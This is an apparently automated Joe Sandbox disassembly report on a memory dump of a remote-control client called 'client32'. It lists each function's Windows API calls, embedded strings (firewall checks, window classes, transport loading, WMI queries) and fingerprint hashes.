Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1

Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetTickCount.KERNEL32(00000000), ref: 111385E2

Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
Part of subcall function 11096D90: CoUninitialize.OLE32 ref: 11096DF9

GetTickCount.KERNEL32 ref: 111385F1
_memset.LIBCMT ref: 11138633
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
_strrchr.LIBCMT ref: 11138658
_free.LIBCMT ref: 111386AA

Strings

ICFConfig2 returned 0x%x, xrefs: 111386B0
ICFConfig, xrefs: 11138595
Client, xrefs: 111385BC
IsICFPresent..., xrefs: 111385CF
No ICF present, xrefs: 111386E2
IsICFPresent() took %d ms, xrefs: 111385FD
*AutoICFConfig, xrefs: 111385B7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: b524ada246f286939a9f3e3c55ef438c10a10b9aa8b6a7d54b94cd4cbe5357d5
Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
Opcode Fuzzy Hash: b524ada246f286939a9f3e3c55ef438c10a10b9aa8b6a7d54b94cd4cbe5357d5
Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1

Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA

AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
LoadMenuA.USER32 ref: 11134DE8
GetSystemMetrics.USER32(00000021,?,110F8239,00000001,11142328,_debug), ref: 11134DF9
GetSystemMetrics.USER32(0000000F,?,110F8239,00000001,11142328,_debug), ref: 11134E01
GetSystemMetrics.USER32(00000004,?,110F8239,00000001,11142328,_debug), ref: 11134E07
GetDC.USER32(00000000), ref: 11134E13
GetDeviceCaps.GDI32(00000000,0000005A,?,110F8239,00000001,11142328,_debug), ref: 11134E1E
ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
CreateWindowExA.USER32 ref: 11134E7F
GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87

Strings

CreateMainWnd, hwnd=%x, e=%d, xrefs: 11134E8F
NSMWClass, xrefs: 11134E79
mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 11134E3E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-1114959992
Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4

Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11133B70
GetTickCount.KERNEL32(?), ref: 11133BA1
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
GetTickCount.KERNEL32 ref: 11133BBC

Strings

CommonPath, xrefs: 11133BDF
schplayer.exe, xrefs: 11133BF8
Warning. SHGetFolderPath took %d ms, xrefs: 11133BC6
%s%s, xrefs: 11133B6A, 11133C0E
Software\NSL, xrefs: 11133BE4
HasStudentComponents=%d, xrefs: 11133C37
runplugin.exe, xrefs: 11133B4E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795

Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11027286
_strtok.LIBCMT ref: 110272C0
Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4

Strings

TCPIP, xrefs: 110272E2
LoadTransports(%d), xrefs: 110272FC
*max_sessions, xrefs: 11027316
Error. not all transports loaded (%d/%d), xrefs: 11027388
Client, xrefs: 11027276, 1102731B
Protocols, xrefs: 11027271
UseNCS, xrefs: 110272DD
Retrying..., xrefs: 110273A2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 85432cb8bd95123d380fc7145ed5d40164efb296651263655272b4fd187bab25
Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
Opcode Fuzzy Hash: 85432cb8bd95123d380fc7145ed5d40164efb296651263655272b4fd187bab25
Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92

Function 11110DE0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 11110E4A
__CxxThrowException@8.LIBCMT ref: 11110E5F
GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
InitializeCriticalSection.KERNEL32(``N,?,11031700,00000001,00000000), ref: 11110E98
EnterCriticalSection.KERNEL32(``N,?,11031700), ref: 11110EAC
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
LeaveCriticalSection.KERNEL32(``N,?,11031700), ref: 11110F5F

Strings

``N, xrefs: 11110E93, 11110EA0, 11110EA5, 11110F5A
..\ctl32\Refcount.cpp, xrefs: 11110EE6
QueueThreadEvent, xrefs: 11110EEB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent$``N
API String ID: 1976012330-1798648567
Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91

Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11089560: UnhookWindowsHookEx.USER32 ref: 11089583

GetCurrentThreadId.KERNEL32 ref: 111037EC
GetThreadDesktop.USER32(00000000), ref: 111037F3
OpenDesktopA.USER32 ref: 11103803
SetThreadDesktop.USER32 ref: 11103810
CloseDesktop.USER32 ref: 11103829
GetLastError.KERNEL32 ref: 11103831
CloseDesktop.USER32 ref: 11103847
GetLastError.KERNEL32 ref: 1110384F

Strings

SetThreadDesktop(%s) ok, xrefs: 1110381B
SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
OpenDesktop(%s) failed, e=%d, xrefs: 11103857

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6

Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
GetLastError.KERNEL32 ref: 1115F275
wsprintfA.USER32 ref: 1115F288

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9

Strings

m_aProp, xrefs: 1115F2BA
NSMReflect, xrefs: 1115F2C7
NSMDropTarget, xrefs: 1115F2CE
NSMWndClass, xrefs: 1115F260
GlobalAddAtom failed, e=%d, xrefs: 1115F282
..\ctl32\wndclass.cpp, xrefs: 1115F299, 1115F2B5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81

Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyA.ADVAPI32 ref: 110613A4
_malloc.LIBCMT ref: 110613EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

RegEnumValueA.ADVAPI32 ref: 1106142B
RegEnumValueA.ADVAPI32 ref: 11061492
_free.LIBCMT ref: 110614A4

Strings

maxname < _tsizeof (m_szSectionAndKey), xrefs: 110613D8
strlen (k.m_k) < _tsizeof (m_szSectionAndKey), xrefs: 110615AA
..\ctl32\Config.cpp, xrefs: 110613B3, 110613D3, 110615A5
err == 0, xrefs: 110613B8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
API String ID: 999355418-161875503
Opcode ID: 79f9d95dc31589ce229f42c46481764fd215ce45ce6817b319d42404178997cd
Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
Opcode Fuzzy Hash: 79f9d95dc31589ce229f42c46481764fd215ce45ce6817b319d42404178997cd
Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1

Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 1115C927
CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
wsprintfW.USER32 ref: 1115C967
SysAllocString.OLEAUT32(?), ref: 1115C973
wsprintfW.USER32 ref: 1115CA27
SysFreeString.OLEAUT32(?), ref: 1115CAC8

Strings

WQL, xrefs: 1115CA40
SELECT * FROM %s, xrefs: 1115CA21
root\CIMV2, xrefs: 1115C961

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51

Function 11017A40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67libraryloaderCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,B24479DC,11030346,00000000), ref: 11017A6E
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
SetLastError.KERNEL32(00000078), ref: 11017ADD
FreeLibrary.KERNEL32(00000000), ref: 11017AE8

Strings

QueueUserWorkItem, xrefs: 11017AB9
Kernel32.dll, xrefs: 11017A74

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateErrorEventFreeItemLastLoadProcQueueUserWork
String ID: Kernel32.dll$QueueUserWorkItem
API String ID: 3361249393-4150702566
Opcode ID: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
